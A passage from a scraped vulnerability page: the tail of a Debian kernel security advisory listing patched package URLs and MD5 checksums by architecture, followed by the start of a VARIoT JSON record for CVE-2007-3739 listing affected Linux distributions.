checksum: 1036 088234b948dd74a6c869f743a5346a54 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-image-2.6.8-alpha_2.6.8-17sarge1.dsc Size/MD5 checksum: 812 e12f4f68ee249f53bab5b4752d6b2795 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-i386_2.6.8-17sarge1.tar.gz Size/MD5 checksum: 96384 bd4d726f97468d6cca1139cf80b1342a http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-i386_2.6.8-17sarge1.dsc Size/MD5 checksum: 1047 80bb021a47b74d6b1e486c2bba6c55b8 http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-source-2.6.8_2.6.8-17sarge1.dsc Size/MD5 checksum: 1002 0a956bc9d48251885d52d4b4d4b07310 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-patch-powerpc-2.6.8_2.6.8-13sarge1.dsc Size/MD5 checksum: 1071 39e866b6617c57f4acf7e06d3b7ae82e http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.9.1sarge8.tar.gz Size/MD5 checksum: 32434 ee1ef40c64f09bcdc25d9c9b7ea325e0 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-m68k_2.6.8-5sarge1.dsc Size/MD5 checksum: 874 9db0c07fe9a8cc114a82f3d4f8a209a9 http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-source-2.6.8_2.6.8.orig.tar.gz Size/MD5 checksum: 43929719 0393c05ffa4770c3c5178b74dc7a4282

Architecture independent packages:

http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-source-2.6.8_2.6.8-17sarge1_all.deb Size/MD5 checksum: 34955480 ece884d31c0a9bd290d467f00973252e http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-patch-2.6.8-s390_2.6.8-6sarge1_all.deb Size/MD5 checksum: 16650 2304fae6c3d145826acea1403133ef98 http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-tree-2.6.8_2.6.8-17sarge1_all.deb Size/MD5 checksum: 39758 12ee237ef5816a9c1f87697a0397802a http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-doc-2.6.8_2.6.8-17sarge1_all.deb Size/MD5 checksum: 6190062 e7e672dd30a416f98fb8dd3ead7e938b http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-patch-debian-2.6.8_2.6.8-17sarge1_all.deb Size/MD5 checksum: 1194926 dfc3e12e6e7739c91c17e150a7242fa2

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-headers-2.6.8-4-generic_2.6.8-17sarge1_alpha.deb Size/MD5 checksum: 238146 8dd62b8c39cceeedd5efaa4b2eee4582 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-headers-2.6.8-4-smp_2.6.8-17sarge1_alpha.deb Size/MD5 checksum: 232626 0f789080227336bd274f4ddacc4a749b http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-headers-2.6.8-4_2.6.8-17sarge1_alpha.deb Size/MD5 checksum: 2765374 6f857f2bc6f2f0d5a94a98ae814c4e87 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-image-2.6.8-4-smp_2.6.8-17sarge1_alpha.deb Size/MD5 checksum: 20094120 e0a3941fdaa513458f54b78e5b3ebd41 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-image-2.6.8-4-generic_2.6.8-17sarge1_alpha.deb Size/MD5 checksum: 20242970 0944d9b857e2383f2748fab122de3a5d

amd64 architecture (AMD x86_64 (AMD64))

http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-em64t-p4-smp_2.6.8-17sarge1_amd64.deb Size/MD5 checksum: 225228 fc7e590bc877da3505ee3442409bf8ee http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-em64t-p4_2.6.8-17sarge1_amd64.deb Size/MD5 checksum: 228186 4663c6daf166b5559e408795f44d84f5 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-amd64-generic_2.6.8-17sarge1_amd64.deb Size/MD5 checksum: 12579110 41c47936fe7cd1bb8e28177cf282e957 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-amd64-generic_2.6.8-17sarge1_amd64.deb Size/MD5 checksum: 231428 dfdf341727fcca4af9ff41f7f0046e1b http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-amd64-k8-smp_2.6.8-17sarge1_amd64.deb Size/MD5 checksum: 13238846 51bca8a45157f119dc001e786e325cca http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-em64t-p4-smp_2.6.8-17sarge1_amd64.deb Size/MD5 checksum: 13063162 14486d83aee59b7616ff63de003340ac http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-amd64-k8_2.6.8-17sarge1_amd64.deb Size/MD5 checksum: 13275762 767dcb70ca259ff0dc07f6cb8351a83d http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13_2.6.8-17sarge1_amd64.deb Size/MD5 checksum: 2728264 db7534ded22b911afffa5413d540dbbd http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-amd64-k8-smp_2.6.8-17sarge1_amd64.deb Size/MD5 checksum: 226722 33c904e9fd0a2f754f0d5aed640a3bd3 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-amd64-k8_2.6.8-17sarge1_amd64.deb Size/MD5 checksum: 230322 917d95bec917d2a7588867f81d88a2e9 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-em64t-p4_2.6.8-17sarge1_amd64.deb Size/MD5 checksum: 13082028 78be67d79a13baba4a6c798624f7f818

hppa architecture (HP PA RISC)

http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-4_2.6.8-7sarge1_hppa.deb Size/MD5 checksum: 2820206 0a14c1185bcde28d0a97eaeef9e11e3f http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-4-64_2.6.8-7sarge1_hppa.deb Size/MD5 checksum: 17550802 fabf823c16fcb3e0bbf69d0081faafd8 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-4-64-smp_2.6.8-7sarge1_hppa.deb Size/MD5 checksum: 219244 ff1d717d7b3d1db40c96d15b96b8a447 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-4-64-smp_2.6.8-7sarge1_hppa.deb Size/MD5 checksum: 18374164 e088d77a7e64efa4d825416f94fd5db6 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-4-32-smp_2.6.8-7sarge1_hppa.deb Size/MD5 checksum: 220054 5e8db88176af86cf5d5968dac2816ac6 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-4-32-smp_2.6.8-7sarge1_hppa.deb Size/MD5 checksum: 17020158 1e3f2fc9f9764e1823054df8abde860c http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-4-32_2.6.8-7sarge1_hppa.deb Size/MD5 checksum: 220598 e3419d467dc69e90e2db720c519268d3 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-4-32_2.6.8-7sarge1_hppa.deb Size/MD5 checksum: 16110870 cb91278b4861aa27da3555e3ae05a842 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-4-64_2.6.8-7sarge1_hppa.deb Size/MD5 checksum: 219758 ff98c244a5777bf1cb9d3aa42e92035b

i386 architecture (Intel ia32)

http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-4-k7-smp_2.6.8-17sarge1_i386.deb Size/MD5 checksum: 258700 b406cff5cdfce0b1ebb0999b940bcf77 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-4-386_2.6.8-17sarge1_i386.deb Size/MD5 checksum: 14079400 b3034d3d756026061d6d1ae64f7670ac http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-amd64-k8-smp_2.6.8-17sarge1_i386.deb Size/MD5 checksum: 226622 89ab2fe13383be55139f779983e76f56 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-em64t-p4_2.6.8-17sarge1_i386.deb Size/MD5 checksum: 228124 0232808c2f4af4679ff387fd5aef30c2 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-amd64-k8-smp_2.6.8-17sarge1_i386.deb Size/MD5 checksum: 13238830 83c9fa536a5039d9b7faaedd55c0d2df http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-em64t-p4-smp_2.6.8-17sarge1_i386.deb Size/MD5 checksum: 13208166 7d76aba45eeea785e68e144c93f8fa55 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-amd64-generic_2.6.8-17sarge1_i386.deb Size/MD5 checksum: 231474 a9af96e38de18058a0bbb855ed0193f3 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-4-686_2.6.8-17sarge1_i386.deb Size/MD5 checksum: 15558172 1ef83fe26c46d25f209cb0a76140c0e3 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-em64t-p4_2.6.8-17sarge1_i386.deb Size/MD5 checksum: 13236626 fad30247937094d606a01d53a2eff086 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13_2.6.8-17sarge1_i386.deb Size/MD5 checksum: 2728376 e2538d185c863ac7adf9dd41ac73f83d http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-4-686-smp_2.6.8-17sarge1_i386.deb Size/MD5 checksum: 15397692 580feea340f69d04fafcd052268bb314 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-4-k7-smp_2.6.8-17sarge1_i386.deb Size/MD5 checksum: 15173410 f477356acda36ec633c3bee285794377 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-4_2.6.8-17sarge1_i386.deb Size/MD5 checksum: 2784978 76f4162d37d785b5e0648435936774f6 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-4-386_2.6.8-17sarge1_i386.deb Size/MD5 checksum: 263456 3ddcc23d88f64f8a185c3a3dc4ae3402 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-em64t-p4-smp_2.6.8-17sarge1_i386.deb Size/MD5 checksum: 225052 c266db2ed1f497b91c8202c2e9511bd3 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-4-k7_2.6.8-17sarge1_i386.deb Size/MD5 checksum: 15282426 bce3bfbc0e6aede5dc503b37935b050a http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-13-amd64-k8_2.6.8-17sarge1_i386.deb Size/MD5 checksum: 230266 2172a8e3ff5107cb582b5a31111b904b http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-4-686-smp_2.6.8-17sarge1_i386.deb Size/MD5 checksum: 258222 e02e548b571117fa3a0b68add40c3893 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-4-686_2.6.8-17sarge1_i386.deb Size/MD5 checksum: 260930 a4765a3da36be625c104281daecc29d2 http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.9.1sarge8_i386.deb Size/MD5 checksum: 12010766 5c06b0a78b203b2032aa327839fa9795 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-headers-2.6.8-4-k7_2.6.8-17sarge1_i386.deb Size/MD5 checksum: 260956 5bf06a1619132b0624299735caf26879 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-amd64-generic_2.6.8-17sarge1_i386.deb Size/MD5 checksum: 12579278 f6c685f628478fcc8f37257a6e71aedd http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-13-amd64-k8_2.6.8-17sarge1_i386.deb Size/MD5 checksum: 13276128 541fc888c5aa5dee5e186185d1f2256f

ia64 architecture (Intel ia64)

http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-4-itanium_2.6.8-15sarge1_ia64.deb Size/MD5 checksum: 21496770 8336b695564c2eb6d8dc98a13c3b4e1a http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-4-itanium-smp_2.6.8-15sarge1_ia64.deb Size/MD5 checksum: 205878 2f8285b89e03dee6c71f9d8079d13499 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6-mckinley-smp_2.6.8-15sarge1_ia64.deb Size/MD5 checksum: 12228 b69b46b5a764b898baaf3ba3ad056d5f http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6-mckinley_2.6.8-15sarge1_ia64.deb Size/MD5 checksum: 12162 3d5dfd32448f8cb967dd1ce9549789af http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-4_2.6.8-15sarge1_ia64.deb Size/MD5 checksum: 3104422 af94110dd2e8401a975315dd93aaa28b http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6-mckinley_2.6.8-15sarge1_ia64.deb Size/MD5 checksum: 12172 618961c987120133ee1c999e4cf5f62f http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6-mckinley-smp_2.6.8-15sarge1_ia64.deb Size/MD5 checksum: 12236 7ca412f9885d85f92340423de43e284f http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6-itanium_2.6.8-15sarge1_ia64.deb Size/MD5 checksum: 12140 031a5db578a7291bf25c13b7be4b4ec6 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-4-itanium_2.6.8-15sarge1_ia64.deb Size/MD5 checksum: 206340 85610c56d71469abb003503c9395f639 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-4-mckinley_2.6.8-15sarge1_ia64.deb Size/MD5 checksum: 206076 62768e32c962c2f1f2f19c0062800557 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6-itanium-smp_2.6.8-15sarge1_ia64.deb Size/MD5 checksum: 12202 a4a24b0e48c4f6c2c3d8ab17fc6fe4ae http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-4-mckinley_2.6.8-15sarge1_ia64.deb Size/MD5 checksum: 21417820 daa90c69a36eb5baf3231fed495766e1 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-4-mckinley-smp_2.6.8-15sarge1_ia64.deb Size/MD5 checksum: 205672 e5befe9b90d7f8d43ed7e1dfff89851c http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-4-itanium-smp_2.6.8-15sarge1_ia64.deb Size/MD5 checksum: 22158208 8a186facbb3023845284531d27c01486 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6-itanium_2.6.8-15sarge1_ia64.deb Size/MD5 checksum: 12136 fe3ae95000fba99026557e9f3110eef9 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-4-mckinley-smp_2.6.8-15sarge1_ia64.deb Size/MD5 checksum: 22174026 de343e5cddd6936ec435cdc87d5ab689 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6-itanium-smp_2.6.8-15sarge1_ia64.deb Size/MD5 checksum: 12200 75abbf3dc640b0765b0f510c0c783ecb

m68k architecture (Motorola Mc680x0)

http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-sun3_2.6.8-5sarge1_m68k.deb Size/MD5 checksum: 2997446 90b62190daab090dd211b2e2fa76e634 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-mvme16x_2.6.8-5sarge1_m68k.deb Size/MD5 checksum: 3053150 9876f36e6cbad66ac690362955b3ee6c http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-q40_2.6.8-5sarge1_m68k.deb Size/MD5 checksum: 3111618 38fdf55f9f32aa26df0b3001fd6b77a2 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-amiga_2.6.8-5sarge1_m68k.deb Size/MD5 checksum: 3311580 052d54a9c2e6eab73cf870634aaf78e3 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-hp_2.6.8-5sarge1_m68k.deb Size/MD5 checksum: 2992404 cd498a3a110af341e7052fb06ec8b0bc http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-mac_2.6.8-5sarge1_m68k.deb Size/MD5 checksum: 3178962 1160ae756c286e7e2845cbeb1326c3bb http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-mvme147_2.6.8-5sarge1_m68k.deb Size/MD5 checksum: 2982482 677c66d0af2580084d6d061bfd63ffd4 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-bvme6000_2.6.8-5sarge1_m68k.deb Size/MD5 checksum: 3018000 89321aa5c34c8c9c95a61a86d0337699 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-atari_2.6.8-5sarge1_m68k.deb Size/MD5 checksum: 3105192 0a020af9116bd8ac96d2c3eb054b6840

powerpc architecture (PowerPC)

http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-headers-2.6.8-4_2.6.8-13sarge1_powerpc.deb Size/MD5 checksum: 5153168 2f57ad5241d60f31e262541b1b9bf08a http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-4-power3-smp_2.6.8-13sarge1_powerpc.deb Size/MD5 checksum: 13953866 46a1861b3cd33737bdd60a0f72f397c4 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-4-power3_2.6.8-13sarge1_powerpc.deb Size/MD5 checksum: 13599558 0ddb46fa72e94a9018eccfd3d2f0b40c http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-4-powerpc-smp_2.6.8-13sarge1_powerpc.deb Size/MD5 checksum: 13873214 f012b664fbc58bfcdfbba594d38bc855 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-4-power4-smp_2.6.8-13sarge1_powerpc.deb Size/MD5 checksum: 13943782 153a4ba86086ae315977b069a3c8fa3c http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-4-power3_2.6.8-13sarge1_powerpc.deb Size/MD5 checksum: 412788 719ae014adea5b6a7c3c36b2b0e268ed http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-4-powerpc_2.6.8-13sarge1_powerpc.deb Size/MD5 checksum: 412382 228e63e6d49179b0dc802b903b1b52e4 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-4-power4-smp_2.6.8-13sarge1_powerpc.deb Size/MD5 checksum: 411974 bcf255c3858b2d9a01bbbb2b7c25aff2 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-4-powerpc_2.6.8-13sarge1_powerpc.deb Size/MD5 checksum: 13616728 e6762f501e5422e23f023b79037a8ca5 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-4-power4_2.6.8-13sarge1_powerpc.deb Size/MD5 checksum: 412034 0334c1128e3e843ebc68963633480ba4 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-4-powerpc-smp_2.6.8-13sarge1_powerpc.deb Size/MD5 checksum: 412136 a761c81f7e2c38637fecefeb197f8a5b http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-4-power3-smp_2.6.8-13sarge1_powerpc.deb Size/MD5 checksum: 412708 584de35626e4445772f28341560aae76 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-image-2.6.8-4-power4_2.6.8-13sarge1_powerpc.deb Size/MD5 checksum: 13583634 0f334a6487d58f02b75f9102641d4541

s390 architecture (IBM S/390)

http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-4-s390x_2.6.8-6sarge1_s390.deb Size/MD5 checksum: 3199350 2dec14becfc609e1414a00a726a78153 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-4-s390_2.6.8-6sarge1_s390.deb Size/MD5 checksum: 2992448 d90f45f8f995286690ed2c460f5f418b http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-headers-2.6.8-4_2.6.8-6sarge1_s390.deb Size/MD5 checksum: 5092100 c603b5b67a2e4be7b92fc909a64493cd http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-s390/kernel-image-2.6.8-4-s390-tape_2.6.8-6sarge1_s390.deb Size/MD5 checksum: 1150168 8cf8f4a0193c71df9a27b3362b868cc5

sparc architecture (Sun SPARC/UltraSPARC)

http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-4-sparc64-smp_2.6.8-16sarge1_sparc.deb Size/MD5 checksum: 7645904 2c30dc864de96d05d0a3426b36c26d3a http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-headers-2.6.8-4_2.6.8-16sarge1_sparc.deb Size/MD5 checksum: 2896286 54cdf0c85119d5a049164705e54a24d9 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-4-sparc32_2.6.8-16sarge1_sparc.deb Size/MD5 checksum: 4563634 2df1caceab9295aca03f8efb9abfa33a http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-4-sparc64_2.6.8-16sarge1_sparc.deb Size/MD5 checksum: 7449244 1833928627fd502581b283c8d508b423 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-headers-2.6.8-4-sparc32_2.6.8-16sarge1_sparc.deb Size/MD5 checksum: 116254 ccfa57772f57fc041c7e2f52fc09216c http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-headers-2.6.8-4-sparc64-smp_2.6.8-16sarge1_sparc.deb Size/MD5 checksum: 151548 0170da5a8e3a7179073a6ee42fe41b27 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-build-2.6.8-4_2.6.8-16sarge1_sparc.deb Size/MD5 checksum: 10856 5866644f6a69cd14120b2f27b936097e http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-headers-2.6.8-4-sparc64_2.6.8-16sarge1_sparc.deb Size/MD5 checksum: 150948 ed82830f3020847472660683d0a8b5cd

These files will probably be moved into the oldstable distribution on its next update.


For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHvz3RhuANDBmkLRkRApVbAJ9d6wqvYEi8ewaJll1OtoMK1n945QCeLY4u NcwTnhEcZs8czVzN6M2RXoE= =69WA -----END PGP SIGNATURE-----

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200709-0497",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "redhat",
        "version": "5.0"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3.0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (es)"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3 (x86-64)"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "linux",
        "version": "version"
      },
      {
        "model": "turbolinux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "turbo linux",
        "version": "10"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5 (server)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (as)"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4.0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (ws)"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3 (x86)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (as)"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.0 (client)"
      },
      {
        "model": "turbolinux appliance server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "turbo linux",
        "version": "2.0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (ws)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "4 (es)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "linux",
        "version": "2.6.20"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3.0"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3.0 (x86-64)"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000687"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200709-179"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-3739"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
